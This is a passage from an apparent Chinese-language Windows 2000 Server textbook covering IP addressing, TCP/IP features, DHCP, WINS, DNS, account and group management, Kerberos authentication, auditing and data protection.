主机 ID
网络数量
每个网络的主机数量

A
1-126
w
x.y.z
126
16,777,214

B
128-191
w.x
y.z
16,384
65,534

C
192-223
w.x.y
z
2,097,152
254

D
224-239
为多播寻址保留
N/A
N/A
N/A

E
240-254
为实验性应用保留
N/A
N/A
N/A

    对于不是直接或间接连接到 Internet 的专用 TCP/IP 网络，用户可以使用 A 类、B 类或 C 类的有效 IP 地址范围。
    对于通过网络地址转换器 (NAT) 或代理服务器之类的应用层网关间接连接到 Internet 的专用 TCP/IP 网络，指定的网络编号机构 (IANA) 推荐用户使用下表中的专用 IP 地址。

专用网络 ID
子网掩码
IP 地址的范围

10.0.0.0
255.0.0.0
10.0.0.1 - 10.255.255.254

172.16.0.0
255.240.0.0
172.16.0.1 - 172.31.255.254

192.168.0.0
255.255.0.0
192.168.0.1 - 192.168.255.254

    这些范围中的数字是 IANA 为 TCP/IP 网络上的私有使用而保留的，并且不用于 Internet。

Windows 2000 TCP/IP的新增功能
    Windows 2000 TCP/IP 是：
§　基于工业标准网络协议的网络软件。
§　支持 Windows 计算机与局域网和广域网环境连接的可选择路由的企业网络协议。
§　用于 Windows 计算机和不同系统进行连接并共享信息的核心技术和实用程序。
§　访问全局 Internet 服务，如 World Wide Web 和文件传输协议 (FTP) 服务器的基础。
§　强健的、可缩放的、跨平台的客户/服务器框架。
    Windows 2000 的 TCP/IP 已经更新，包括简化单个子网的配置、在高带宽的网络环境中优化 TCP 性能的许多功能。这些新功能包括支持：
§　自动专用地址配置。
§　大 TCP 窗口。
§　选择性确认。
§　更好的往返时间 (RTT) 估计。
§　ICMP 路由器发现。
§　DNS 缓存。
§　禁用 TCP/IP 上的 NetBIOS。

自动专用地址配置
    使用"自动专用 IP 寻址 (APIPA)"为不包含 DHCP 服务器的单个子网网络自动执行 TCP/IP 地址配置。
    默认情况下，运行 Windows 2000 的计算机首先尝试与网络上的 DHCP 服务器联系，以便为每个已安装的网络连接动态获得配置。
§　如果访问了 DHCP 服务器并且租约配置成功，则 TCP/IP 配置完成。
§　如果不能访问 DHCP 服务器，则计算机改为使用 APIPA 自动配置 TCP/IP。使用 APIPA 时，Windows 2000 在 169.254.0.1 到 169.254.255.254 的保留 IP 地址范围内确定地址。这个地址用作临时的 IP 地址配置，直至找到 DHCP 服务器为止。将设置子网掩码为 255.255.0.0。
    IP 地址的 APIPA 范围是指定的网络编号机构 (IANA) 所保留的。这个范围内的任何 IP 地址都不用于 Internet。
    APIPA 为不连接到 Internet 的单个网络的小型公司或家庭公司网络免去 IP 地址配置。
    大 TCP 窗口
    窗口大小反映不需要等候正确认就能发送的数据报的最大数量。当大量数据在发送者和接收者之间传输时，大 TCP 窗口能提高 TCP/IP 的性能。在典型的基于 TCP 的通讯中，窗口的最大尺寸通常在连接开始时固定并且最大限额为 64 KB。
    通过支持大窗口，用户可以在较长的会话过程中使用 TCP 选项动态地重新计算和调整实际窗口大小。使用该选项，每次可以在网络上传输更多的数据包，以此增加吞吐量。

选择性确认
    在典型的基于 TCP 的通讯中，确认是累积的。TCP 只确认与以前获得确认的数据段相邻的接收段。非相邻段，即不按顺序接收的段，不能明确确认。TCP 要求在很短的时间内接收并确认段，而丢失的段及所有跟随其后的段都必需重新传输。
    选择性确认是最新的 TCP 选项，它允许接收者有选择地通知和请求发送者只重新发送实际丢失的数据。这样可以减少需要重新传输的数据量，更好地利用网络带宽。
    更好的 RTT 估计
    TCP 用往返时间 (RTT) 估计在发送者和接收者之间往返通讯所需要的时间。Windows 2000 支持"TCP 往返时间测量"选项来改进估计 RTT。通过经常计算更精确的 RTT 信息，TCP 能更好地估计时间来设置重新传输计时器，这有助于提高整个 IP 速度和性能。
    对估计 RTT 的改进明显有助于长时间的往返网络链路，如跨洲的广域网或使用无线或卫星通讯的链路。
    ICMP 路由器发现
    Internet 控制消息协议 (ICMP) 路由器发现是在默认网关不是手动配置或用 DHCP 指派时用 ICMP 消息发现网段上的默认网关。ICMP 路由器发现由两个 ICMP 消息组成：路由器请求和路由器公布。路由器请求由主机发送以发现网络上的路由器。路由器公布由路由器发送响应路由器请求，并且周期性地通知网络上的主机该路由器仍然可用。默认情况下，ICMP 路由器发现在 Windows 2000 主机的 TCP/IP 上是启用的。
    可以将运行"路由和远程访问"服务的 Windows 2000 Server 计算机配置成支持 ICMP 路由器发现的路由器。

    DNS 缓存
    Windows 2000 TCP/IP 中的域名系统 (DNS) 解析器将 DNS 名称查询进行缓存。使用 Ipconfig 实用程序，可以查看并刷新 DNS 缓存的内容。
    禁用 TCP/IP 上的 NetBIOS
    使用 Windows 2000，用户可以对每个网络连接禁用 TCP/IP (NetBT) 上的 NetBT。此功能是为仅使用 DNS 名称注册和解析技术的计算机使用"Microsoft 网络客户端"和"Microsoft 网络的文件和打印共享"组件与其他禁用 NetBT 的计算机通讯而准备的。禁用 NetBT 的范例包括网络的特定或安全角色的计算机，如边缘代理服务器或防火墙中的安全防护主机，此时不要求或不需要 NetBT 支持。
    以下是运行 Windows 2000 的计算机上禁用 NetBT 应该考虑的：
§　计算机不再对通信监听"用户数据报协议 (UDP)"端口 138 上的 NetBIOS 数据报服务、UDP 端口 137 上的 NetBIOS 名称服务，以及"传输控制协议 (TCP)"端口 139 上的 NetBIOS 会话服务。
§　使用"Microsoft 网络客户端"和"Microsoft 网络的文件及打印共享"组件的基于 TCP/IP 的连接只能用于其他禁用 NetBT 的计算机。这样会影响查看网络上的计算机以及连接文件共享和网络打印机的能力。
§　诸如 WINS、本地子网广播和 Lmhosts 文件之类的 NetBIOS 名称解析技术将不再使用。所有名称解析都通过 DNS 查询和主机文件进行。
§　如果计算机需要作为客户机加入 WINS，则必须在至少一个网络连接上启用 NetBT。
§　如果 Windows 2000 Server 计算机需要运行 WINS 服务，则必须在至少一个网络连接上启用 NetBT。

禁用 NetBT 的一个很好的范例就是连接专用网络和外部网络（如 Internet）的服务器。在这种情况下，Internet 连接不要求 NetBT。通过只对 Internet 连接禁用 NetBT，双重宿主的计算机可以继续用作 WINS 服务器或内部网络的客户机，并且 WINS 客户机仍然为计算机上安装的其他物理网卡产生的连接提供服务。
    可以在 TCP/IP 协议属性中的"WINS"选项卡上禁用 NetBT。
    Windows 2000 TCP/IP 的安全功能
    Windows 2000 TCP/IP 合并了在网络上发送 TCP/IP 数据时提供保护以及处理各种本地主机通讯配置的安全功能。
    网际协议安全
    网际协议安全 (IPSec) 是一组 Internet 标准，使用加密安全服务提供：
§　机密
    IPSec 通信是经过加密的。如果不知道加密密钥，捕获的 IPSec 通信也是无法知道的。
§　身份验证
    IPSec 通信是经过数字签名的，带有共享的加密钥匙，因此接收者可以验证它是由 IPSec 端发送的。
§　数据完整性
    IPSec 通信包含合并到加密钥匙中的加密求校验和。接收方可以确认数据包在传输中是否没有被修改。

    TCP/IP 筛选
    使用 TCP/IP 筛选，在 Windows NT 4.0 中叫做"TCP/IP 安全"的功能，用户可以为每个 IP 接口严格指定所处理的传入 TCP/IP 通讯类型。这个功能设计用于隔离 Internet 或 Intranet 服务器所处理的通信，在没有"路由和远程访问"服务或其他 TCP/IP 应用程序或服务提供 TCP/IP 筛选的情况下。TCP/IP 筛选默认是禁用的。
    TCP/IP 筛选是用于入站本地主机 TCP/IP 通讯的一组筛选器。因为入站 TCP/IP 通讯的目标 IP 地址编成指定的端口地址、适当的子网广播地址或多播地址，因此本地主机通讯是由主机处理的通讯。TCP/IP 筛选不适用于接口之间转发的路由通讯。
    使用 TCP/IP 筛选，用户可以限制本地主机的入站 TCP/IP 通讯，根据：
§　目标 TCP 端口
§　目标 UDP 端口
§　IP 协议

7. 动态主机配置协议（DHCP）
    动态主机配置协议 (DHCP) 是一种简化主机 IP 配置管理的 TCP/IP 标准。DHCP 标准为 DHCP 服务器的使用提供了一种有效的方法：即管理 IP 地址的动态分配以及网络上启用 DHCP 客户机的其他相关配置信息。TCP/IP 网络上的每台计算机都必须有唯一的计算机名称和 IP 地址。IP 地址（以及与之相关的子网掩码）标识主计算机及其连接的子网。将计算机移动到不同的子网时，必须更改 IP 地址。DHCP 允许用户从本地网络上的 DHCP 服务器 IP 地址数据库中为客户机动态指派 IP 地址。对于基于 TCP/IP 的网络，DHCP 减少了重新配置计算机所涉及的管理员的工作量和复杂性。Windows 2000 Server 中的 DHCP 提供以下新功能：
§　为 DHCP 管理员和用户提供有限的服务器和控制台访问的新本地组。
§　IP 地址的自动指派
§　增强的性能监视和服务器报告能力
§　多播作用域和超级作用域的扩展作用域支持
§　对用户指定和供应商指定选项类别的支持
§　DHCP 与 DNS 的集成
§　通过使用 Active Directory 集成来检测未授权的 DHCP 服务器。
§　BOOTP 客户机的动态支持。
    在第十一章中用户还要深入的学习DHCP服务器的安装、配置与管理。

8. Windows 网际名称服务（WINS）
    Windows Internet 命名服务 (WINS) 为注册和查询网络上计算机和用户组 NetBIOS 名称的动态映射提供分布式数据库。WINS 将 NetBIOS 名称映射为 IP 地址，并设计以解决路由环境的 NetBIOS 名称解析中所出现的问题。WINS 对于使用 TCP/IP 上的 NetBIOS 路由网络中的 NetBIOS 名称解析是最佳选择。在Windows 2000 网络中仍然保留了WINS服务并且进行了改进，这主要是为了与非Windows 2000环境的客户机共同使用。Windows 2000 提供了以下 WINS 增强特性：
§　持续连接
§　手动逻辑删除
§　增强的管理实用程序
§　使用和管理高级 WINS 特性更加容易
§　增强的筛选及记录搜索功能

§　动态记录删除和多选
§　记录验证和版本号有效性
§　导出功能
§　对客户增强的容错能力
§　客户端名的动态重新插入
§　只读控制台访问 WINS 控制台。
§　WINS 服务器的命令行管理。
§　增强的数据库引擎。
    而在纯 Windows 2000 的环境中使用 DNS 作为名字确认方案，每个域都由一个 DNS 域名来代表，所以可以不使用 WINS 服务。用户将在第十二章中深入的学习 WINS 的安装与配置。

9. 动态域名服务器（DDNS）
    DNS 是域名系统 (Domain Name System) 的缩写，是一种组织成域层次结构的计算机和网络服务命名系统。DNS 命名用于 TCP/IP 网络，如 Internet，用来通过用户友好的名称定位计算机和服务。当用户在应用程序中输入 DNS 名称时，DNS 服务可以将此名称解析为与此名称相关的其他信息，如 IP 地址。动态更新允许 DNS 客户机在发生更改的任何时候使用 DNS 服务器注册和动态地更新其资源记录。它减少了对区域记录进行手动管理的需要，特别对于频繁移动或改变位置并使用 DHCP 获得 IP 地址的客户机更是如此。对于 Windows 2000 Server，DNS 服务器的服务已经集成到 Active Directory 的设计和实现中，它是由 Microsoft 为使用 Windows NT 技术的网络所设计的下一代目录服务。由于它们的结合为用户带来了以下好处：
§　以 Active Directory 的能力为基础的多主机更新和增强的安全性
§　只要将新的区域添加到 Active Directory，区域就会自动复制并同步至新的 DC
§　通过将 DNS 区域数据库的存储集成到 Active Directory 中，可以简化针为网络规划的数据库复制过程。
§　与标准 DNS 复制相比，目录复制更快捷、更有效
    用户将在第五章中深入的学习 DDNS 的安装与配置。

    10. 帐号与计算机安全
    用户帐号
    用户帐号能够让用户以授权的身份登录到计算机和域中并访问其中资源。用户帐号也可以作为某些软件的服务帐号。Windows 2000 在安装时提供了两个预定义用户帐号：
§　Administrator
    系统管理员帐号，拥有最高的权限，用户可以利用它来管理Windows2000Server 的资源，但Administrator并不是自动对Server中的所有目录和文件都拥有访问权限，管理员帐号的名称可以更改，但不可以删除。
§　Guest account
    为来客临时使用而设立的帐号，它只有很少的权限，它的名称可以更改，但也不能删除，在默认状态下它是不可用的。
    计算机帐号
    每一个运行Windows 2000和Windows NT的计算机在加入到域时都需要一个计算机帐号，就象用户帐号一样，被用来验证和审核计算机的登录过程和访问域资源。

    组
    组是可包含用户、联系人、计算机和其他组的 Active Directory 或本机对象。使用组可以：
§　管理用户和计算机对 Active Directory 对象及其属性、网络共享位置、文件、目录、打印机列队等共享资源的访问。
§　筛选器组策略设置
§　创建电子邮件通讯组
    有两种类型的组：
§　安全组
§　通讯组
    安全组用于将用户、计算机和其他组收集到可管理的单位中。为资源（文件共享、打印机等等）指派权限时，管理员应将那些权限指派给安全组而非个别用户。权限可一次分配给这个组，而不是多次分配给单独的用户。使用组而不是单独的用户可简化网络的维护和管理。
    通讯组只能用作电子邮件的通讯组。不能用于筛选组策略设置。通讯组无安全功能。
    任何时候，组都可以从安全组转换为通讯组，反之亦然，但仅限于域处于本机模式的情况下。域处于混合模式时不能转换组。

下表总结了域模式对组的作用。

本机模式域
混合模式域

安全组和通讯组均可具有通用作用域。

只有通讯组才能有通用作用域。

允许整组嵌套。

对于安全组，组嵌套限于具有域本地作用域的组，该组将其成员作为有全局作用域的组（Windows NT 4.0 规则）。对于通讯组，允许整组嵌套。

组可在安全组和通讯组之间自由转换。有全局或域本地作用域的组可转换为具有通用作用域的组。

不允许组转换。

组作用域
    每个安全组和通讯组均具有作用域，该作用域标识组在域树或树林中所应用的范围。有三类不同的作用域通用、全局和域本地。
§　有通用作用域的组可将其成员作为来自域树或树林中任何 Windows 2000 域的组和帐户，并且在域树或树林的任何域中都可获得权限。有通用作用域的组称为通用组。
§　有全局作用域的组可将其成员作为仅来自组所定义的域的组和帐户，并且在树林的任何域中都可获得权限。有全局作用域的组称作全局组。
§　具有域本地作用域的组可将其成员作为来自 Windows 2000 或 Windows NT 域的组和帐户，并且可用于仅在域中授予权限。具有域本地作用域的组称作域本地组。

    如果具有多个树林，仅在一个树林中定义的用户不能放入在另一个树林中定义的组，并且仅在一个树林中定义的组不能指派另一个树林中的权限。

通用作用域
全局作用域
域本地作用域

在本机模式域中，可将其成员作为来自任何域的帐户、来自任何域的全局组和来自任何域的通用组。

在本机模式域中，可将其成员作为来自相同域的帐户和来自相同域的全局组。

在本机模式域中，可将其成员作为来自任何域的帐户、全局组和通用组，以及来自相同域的域本地组。

在本机模式域中，不能创建有通用作用域的安全组。

在本机模式域中，可将其成员作为来自相同域的帐户。

在本机模式域中，可将其成员作为来自任何域的帐户和全局组。

组可被放入其他组（当域处于本机模式时）并且在任何域中指派权限。

组可被放入其他组并且在任何域中指派权限。

组可被放入其他域本地组并且仅在相同域中指派权限。

不能转换为任何其他组作用域。

只要它不是有全局作用域的任何其他组的成员，则可以转换为通用作用域。

只要它不把具有域本地作用域的其他组作为其成员，则可转换为通用作用域。

    内置和预定义组
    安装域控制器时，部分默认的组安装于"Active Directory 用户和计算机"控制台的"内置"和"用户"文件夹中。这些组是安全组并且代表一些公用的权利和权限集合，可用于将某些角色、权利和权限授予用户放入默认组的帐户和组。
    有域本地作用域的默认组放在"内置"文件夹中。有全局作用域的预定义组放在"用户"文件夹中。可将内置和预定义组移动到域中的其他组或组织单位文件夹，但不能将它们移动至其他域。
    内置组
    放入"Active Directory 用户和计算机"的"内置"文件夹中的默认组为：
§　帐户操作员
§　管理员
§　备份操作员
§　来宾
§　打印操作员
§　复制器
§　服务器操作员
§　用户

下表显示了这些组拥有的默认权利：

用户权利
允许
在默认情况下分配有此权利的组

从网络访问该计算机
连接到网上的计算机。
管理员、每个人、超级用户

备份文件和文件夹
备份文件和文件夹该权利将取代文件和文件夹权限
管理员、备份操作员

旁路遍历检查
即使用户没有访问父文件夹的权限，也可在文件夹之间移动以访问文件。
每个人

更改系统时间
设置计算机内部时钟的时间。
管理员、超级用户

创建页面文件
该权利无效。
管理员

（续表）

用户权利
允许
在默认情况下分配有此权利的组

调试程序
调试各种底层对象，例如线程。
管理员

从远程系统强制关机
关闭远程计算机。
管理员

增加调度优先级
提高进程的执行优先级。
管理员、超级用户

加载和卸载设备驱动程序
安装和删除设备驱动程序。
管理员

本地登录
通过计算机键盘在计算机上登录。
管理员、备份操作员、每个人、来宾、超级用户和用户

（续表）

用户权利
允许
在默认情况下分配有此权利的组

管理审计和安全日志
指定需要审计的资源访问（诸如文件访问）类型，并且查看和清除安全日志。该权利不允许用户设置系统审计策略。管理员组的成员始终可以查看和清除安全日志。
管理员

修改固件环境变量
修改存储于支持此类配置的计算机非易失内存中的系统环境变量。
管理员

图示单独的进程
用图表的形式显示某个进程的情况（性能数据采集）
管理员、超级用户

图示文件系统性能
用图表的形式显示计算机的情况（性能数据采集）
管理员

还原文件和文件文件夹
恢复备份文件和文件文件夹该权利将取代文件和目录权限
管理员、备份操作员

（续表）

用户权利
允许
在默认情况下分配有此权利的组

关闭系统
关闭 Windows 2000
管理员、备份操作员、每个人、超级用户和用户

取得文件或其他对象的所有权

取得文件、文件夹、打印机和计算机上（或连接在计算机上）的其他对象的所有权。该权利将取代保护对象的权限。有关文件和文件夹权限的信息。

管理员

    这些具有域本地作用域的内置组主要用于将默认权限集合指派给在该域中具有某些管理控制权的用户。例如，域中的管理员组对域中的所有帐户和资源具有广泛的管理权限。
    预定义组
    放在"Active Directory 用户和计算机"的"用户"文件夹中的预定义组有：
§　组名称
§　证书发行者
§　域管理器
§　域计算机
§　域控制器
§　域来宾
§　域用户
§　企业管理员
§　组策略管理员
§　架构管理员
    可使用这些有全局作用域的组将该域中各种类型的用户帐户（普通用户、管理员和来宾）收集到组中。然后这些组可以放入该域和其他域中有域本地作用域的组。

在默认情况下，用户创建的任何用户帐户都将自动添加到域用户组中，并且用户创建的任何计算机帐户都将自动添加到域计算机组。可使用域用户和域计算机组来表示域中创建的全部帐户。例如，如果用户希望本域中所有用户有访问打印机的权限，可将打印机的权限指派给域用户组（或将域用户组放入具有打印机权限的域本地组中）。
    特殊身份
    除"内置"和"用户"文件夹中的组以外，Windows 2000 Server 还包括几种特殊身份：为方便起见，这些身份通称为组。这些特殊组没有用户可修改的特别成员身份，但是它们能根据环境在不同时间代表不同用户。这三个特殊组为：
§　每个人
    代表所有当前网络的用户，包括来自其他域的来宾和用户。无论用户何时登录到网络上，它们都将被自动添加到 Everyone 组。
§　网络
    代表当前通过网络访问给定资源的用户（不是通过从本地登录到资源所在的计算机来访问资源的用户）。无论用户何时通过网络访问给定的资源，它们都将自动添加到网络组。
§　交互
    代表当前登录到特定计算机上并且访问该计算机上给定资源的所有用户（不是通过网络访问资源的用户）。无论用户何时访问当前登录的计算机上所给的资源，它们都被自动添加到交互组。

    组对网络性能影响
    用户登录到 Windows 2000 网络时，Windows 2000 域控制器决定用户属于哪个组。Windows 2000 创建安全令牌并将其指派给用户。安全令牌列出了用户帐户 ID 和用户所属的所有安全组的安全 ID。组成员身份可能影响网络性能，由于：
§　登录的影响
    建立安全令牌需要时间，所以用户所属的安全组越多，生成这个用户安全令牌的时间越长，并且该用户登录到网络的时间也越长。造成这一影响的程度将随着网络带宽以及处理登录过程的域控制器的配置而变化。
    有时，用户可能想创建只用于电子邮件的组，并不准备使用该组将权利和权限指派给它的成员。为提高登录性能，可创建类似通讯组的组而非安全组。因为 Windows 2000 在登录过程中生成用户安全令牌时忽略了通讯组，所以这将减少令牌的大小以及生成令牌所需的时间。

§　有通用作用域的组的复制
    对存储在全局编录中的数据的更改将复制到树林的每个全局编录中。有通用作用域的组及其成员列在全局编录中。有通用作用域的组的一个成员更改时，整个组成员身份都必须复制到域树或树林中的所有全局编录中。
    具有全局或域本地作用域的组也列在全局编录中，但未列出其成员。这将会减小全局编录的大小，并且明显减少需要随时更新全局编录的复制通信量。可通过为经常更改的目录对象使用具有全局或域本地作用域的组来提高网络性能。
§　网络带宽
    每个用户的安全令牌都被发送到用户访问的每台计算机，以使目标计算机能够对照该计算机上所有资源的权限列表比较包含在令牌内的所有安全 ID，从而决定用户在该计算机上是否有相应的权利或权限。目标计算机还检查令牌中的任何安全 ID 是否属于目标计算机上的任何本地组。
    用户所属的组越多，其安全令牌就越大。如果用户的网络有大量用户，这些大型安全令牌对网络带宽和域控制器处理能力的影响非常明显。

安全模型
    Windows 2000 安全模型的主要功能是用户身份验证和访问控制。
    用户身份验证: Windows 2000 安全模型包括用户身份验证的概念，这种身份验证赋予用户登录系统访问网络资源的能力。在这种身份验证模型中，安全性系统提供了两种类型的身份验证：交互式登录(根据用户的本地计算机或 Active Directory 帐户确认用户的身份)和网络身份验证（根据此用户试图访问的任何网络服务确认用户的身份）。为提供这种类型的身份验证，Windows 2000 安全系统包括了三种不同的身份验证机制：Kerberos V5、公钥证书和 NTLM（与 Windows NT 4.0 系统兼容）。
    基于对象的访问控制：通过用户身份验证，Windows 2000 允许管理员控制对网上资源或对象的访问。Windows 2000 通过允许管理员为存储在 Active Directory 中的对象分配安全描述符实现访问控制。安全描述符列出了允许访问对象的用户和组，以及分配给这些用户和组的特殊权限。安全描述符还指定了需要为对象审核的不同访问事件。文件、打印机和服务都是对象的实例。通过管理对象的属性，管理员可以设置权限，分配所有权以及监视用户访问。

    管理员不仅可以控制对特殊对象的访问，也可以控制对该对象特定属性的访问。例如，通过适当配置对象的安全描述符，用户可以被允许访问一部分信息，如只访问员工姓名和电话号码而不能访问他们的家庭住址。
    Active Directory 和安全性：Active Directory 通过使用对象和用户凭据的访问控制提供了对用户帐户和组信息的保护存储。由于 Active Directory 不仅存储用户凭据还存储访问控制信息，因此登录到网络的用户将同时获得访问系统资源的身份验证和授权。例如，用户登录到网络时，Windows 2000 安全系统通过存储在 Active Directory 上的信息来验证用户。然后，当用户试图访问网络上的服务时，系统检查由任意访问控制列表为这一服务定义的属性。由于 Active Directory 允许管理员创建组帐户，因此管理员可以更有效地管理系统的安全性。例如，通过调节文件属性，管理员可以允许组中的所有用户读取文件。这样，访问 Active Directory 中的对象以组成员为基础。

域的体系结构
    域和安全性
    域是网络对象的分组。例如：用户、组和计算机。域中所有的对象都存储在 Active Directory 下。Active Directory 可以常驻在某个域中的一个或多个域控制器下。每个域都是一个安全界限，这意味着安全策略和设置（例如系统管理权利、安全策略和访问控制表）不能跨越不同的域。特定域的系统管理员有权设置仅属于该域的策略。由于每个域都是一个安全壁垒，因此不同的系统管理员可以在单位中创建和管理不同的域。 理解域的关键是：
    安全策略可以贯穿整个域来实现。
    为保证数据库的同步，包括安全信息的 Active Directory 会定期复制到域中每个域控制器。
    Active Directory 中的对象可以按组织单位的不同级别进行组织和管理。
    可转移的信任关系可以建立在域树中的域之间。
    单个域和多个域
    Windows NT 4.0 限制了目录可以存储的用户帐户的个数。因此，为了适应大计算环境的需要，创建和管理多个域而且每个都拥有自己的用户帐户目录对于单位来说就非常必要了。域通常按以下两种类型进行组织：主域（存储用户和组的帐户）和资源域（存储文件、打印机、应用程序服务等等）。
    这种多域的计算环境被称为多主域模式。多主域模式意味着资源域需要与所有的主域具有多个信任关系。这些信任关系允许主域的用户访问资源域中的资源。

身份验证
    身份验证是系统安全性的一个基本方面。它负责确认试图登录域或访问网络资源的任何用户的身份。Windows 2000 身份验证允许对整个网络资源进行单独登记。采用单独登记的方法，用户可以使用单个密码或智能卡一次登录到域，然后通过身份验证向域中的所有计算机表明身份。
    身份验证过程
    在 Windows 2000 计算环境中成功的用户身份验证包括两个独立的过程：
    交互式登录向域帐户或本地计算机确定用户的身份
    网络身份验证对该用户试图访问的任何网络服务确定用户身份
    身份验证类型
    Windows 2000 支持几种工业标准的身份验证类型。验证用户身份时，Windows 2000 依据多种要素使用不同种类的身份验证。Windows 2000 支持的身份验证类型有：
    Kerberos V5 身份验证
    Kerberos V5 是在域中进行身份验证的主要安全协议。Kerberos V5 协议校验了用户的身份和网络服务。这种双重验证被称为相互身份验证。这也是为系统服务提供的默认网络身份验证方法。
    Kerberos V5 的工作原理
    Kerberos V5 身份验证机制颁发用于访问网络服务的票证。这些票证包含加密的数据，包括加密的密码，用于向请求的服务确定用户的身份。除了输入密码或智能卡凭据，整个身份验证过程对用户都是不可见的。Kerberos V5 中的一项重要服务是密钥分发中心 (KDC)。KDC 作为 Active Directory 的一部分在每个域控制器上运行，它存储了所有客户密码和其他帐户信息。

Kerberos V5 身份验证过程按如下方式工作：
    客户端系统上的用户使用密码或智能卡对 KDC 进行身份验证。
    KDC 向此客户颁发了一个特别的授权票证。客户系统使用 TGT 访问授票服务 (TGS)，这是域控制器上的Kerberos V5 身份验证机制的一部分。
    TGS 接着向客户颁发服务票证。
    客户向请求的网络服务出示服务票证。服务票证向此服务证明用户的身份，同时也向该用户证明服务的身份。
    Kerberos V5 和域控制器
    Kerberos V5 服务安装在每个域控制器上，并且 Kerberos 客户端安装在每个 Windows 2000 工作站和服务器上。 每个域控制器作为 KDC 使用。Windows 2000 系统使用域名服务器 (DNS) 查找最近的可用域控制器的位置。域控制器在用户登录会话中作为该用户的首选 KDC 运行。如果首选 KDC 不可用，Windows 2000 系统查找预备的 KDC 来提供身份验证。
    身份验证的委派
    身份验证的委派是管理员授予用户或计算机帐户的一种特权。在默认情况下，只有域管理员才被授予这一特权。这一特权必须有选择性地指派给可信任的服务。在 N 层的应用程序中，用户向中层服务验证身份。中层服务代表用户向后端数据服务器验证身份。委派取决于信任委派的中层服务。信任委派意味着这一服务可以模拟用户使用其他的网络服务。
    Kerberos V5 互操作性
    Windows 2000 支持两种类型的 Kerberos V5 互操作性：
    信任关系必须建立在域和基于 MIT 的 Kerberos 领域之间。这意味着 Kerberos 领域的客户可对 Active Directory 域验证身份，以访问该域上的网络资源。
    在某个域中，UNIX 客户和服务器可以拥有 Active Directory 帐户，并因此从域控制器获得身份验证。
    安全套接字层 (SSL) 和传输层安全性 (TLS) 的身份验证
    在用户试图访问安全的 Web 服务器时使用。
    NTLM 身份验证
    在 Windows 2000 中，NTLM 被用作域中两台计算机之间事务的身份验证协议，其中一台或两台计算机运行 Windows NT 4.0 或更早版本。Windows 2000 在默认情况下以混合模式网络配置安装。混合模式的网络配置使用 Windows NT 4.0 和 Windows 2000 的任意组合系统。如果没有混合模式网络，可以在域控制器中转换为本地模式来禁用 NTLM 身份验证。

    授权
    Windows 2000 的安全性建立在身份验证和授权之上。
    管理员可以指派特定权利组帐户或单个用户帐户。
    用户权利定义了本地级别上的功能。虽然用户权利可以应用于单个的用户帐户，但最好是在组帐户基础上管理。这样可以确保作为组成员登录的帐户将自动继承该组的相关权利。通过对组而不是对单个用户指派用户权利，可以简化用户帐户管理的任务。当组中的用户都需要相同的用户权利时，用户可以一次对该组指派用户权利，而不是重复地对每个单独的用户帐户指派相同的用户权利。
    对组指派的用户权利应用到该组的所有成员（在它们还是成员的时候）。如果用户是多个组的成员，则用户权利是累积的，这意味着用户有多组权利。指派给某个组的权利只有在特定登录权利的情况下才会与指派给其他组的权利发生冲突。然而，指派给某个组的用户权利通常不会与指派给其他组的权利冲突。要删除用户的权利，管理员只需简单地从组中删除用户。在这种情况下，用户不再拥有指派给这个组的权利。
    用户权利有两种类型：特权和登录权利。
§　特权。特权的一个典型范例就是备份文件和目录的权利。
§　登录权利。登录权利的一个典型范例就是登录本地系统的权利。

    审核
    安全审核是 Windows 2000 的一项功能，负责监视各种与安全性有关的事件。监视系统事件对于检测入侵者以及危及系统数据安全性的尝试是非常必要的。
    应该被审核的最普通的事件类型包括：
§　访问对象，例如文件和文件夹
§　户和组帐户的管理
§　用户登录以及从系统注销时
    除了审核与安全性有关的事件，Windows 2000 还生成安全日志并提供了查看日志中所报告的安全事件的方法。

安全策略
    安全设置定义了系统的安全相关操作。通过对 Active Directory 中组策略对象的使用，系统管理员可以集中应用保护企业系统所要求的安全级别。
    确定包括多台计算机的组策略对象的设置时，必须考虑给定站点、域或单位的组织和功能特征。例如，销售部门的计算机和财务部门的计算机对安全级别的需要就大不一样。
    安全设置
    安全设置包括安全策略（帐户和本地策略）、访问控制（服务、文件、注册表）、事件日志、组成员（受限的组）、网际协议 (IP) 的安全策略和公钥策略。
    安全模板
    安全模板是安全配置的物理表现：一组安全设置应该存储于一个文件中。Windows 2000 包括一组以计算机的角色为基础的安全模板：从低安全域客户端的安全设置到非常安全的域控制器。这些模板可用于创建自定义安全模板，修改模板或者作为自定义安全模板的基础。
    安全配置工具
    管理员可使用安全模板管理单元来定义和使用安全模板。
    管理员可使用安全配置和分析管理单元来配置和分析本地的安全性。
    管理员可使用组策略管理单元来配置 Active Directory 中的安全性。

    数据保护
    数据的保密性和完整性开始于网络的身份验证。用户可以通过适当的凭据（安全的密码或者公钥凭据）在网络上登录，并在此过程中获得访问存储数据的权限。
    Windows 2000 支持两种数据保护方式：存储数据和网络数据。以下部分介绍这两种类型的保护方式。
    存储数据的保护
    保护存储的数据（联机或是脱机）可以通过：
    文件加密系统 (EFS)：EFS 使用公钥加密技术对本地的 NTFS 数据进行加密。
    数字签名:数字签名对软件组件进行签名以确保它们的合法性。
    网络数据的保护
    在用户的工作环境（局域网和子网）中的网络数据通过身份验证协议来保护它的安全。用户也可以选择其他的安全级对用户工作环境中的网络数据进行加密。使用网际协议 (IP) 的安全机制，用户可以为指定的客户端或某个域中的所有客户端的所有网络通讯数据进行加密。
    传入及传出用户所在工作环境的网络数据（通过内部网、外部网或 Internet 网关）可以通过使用以下实用程序进行保护：
    网际协议安全。对客户端的所有 TCP/IP 通讯进行加密。
    路由和远程访问。配置远程访问协议和路由。
    代理服务器。为站点提供防火墙和代理服务器。
    另外，象 Microsoft Exchange、Microsoft Outlook 和 Microsoft Internet Explorer 这样的程序都提供了某个站点内或者整个网络上的信息和事务的公钥加密。

公钥基础结构
    在这个信息互连的时代，单位的网络可能包括内部网、Internet 站点和外部网这些都有可能被一些未经授权、蓄意盗阅或更改单位数字信息财产的个人访问。
    有许多潜在的机会可未经授权访问网络上的信息。个人可以尝试监视或更改类似于电子邮件、电子商务和文件传输这样的信息流。用户的单位可能与合作伙伴在限定的范围和时间内进行项目合作，有些雇员用户虽然一无所知，但却必须给他们一定的权限访问用户的部分信息资源。如果用户的用户为了访问不同安全系统需要记住许多密码，他们可以会选择一些防护性较差或很普通的密码，以便于记忆。这不仅给黑客提供一个容易破解的密码，而且还提供了众多安全系统和存储数据的访问。
    那么，系统管理员怎样才能确定正在访问信息的用户的身份而且利用身份对被访问的信息进行控制呢？另外，系统管理员怎样才能轻松而安全地分发和管理单位中的身份凭证呢？这些都是可以通过仔细规划的公钥基础结构解决的问题。
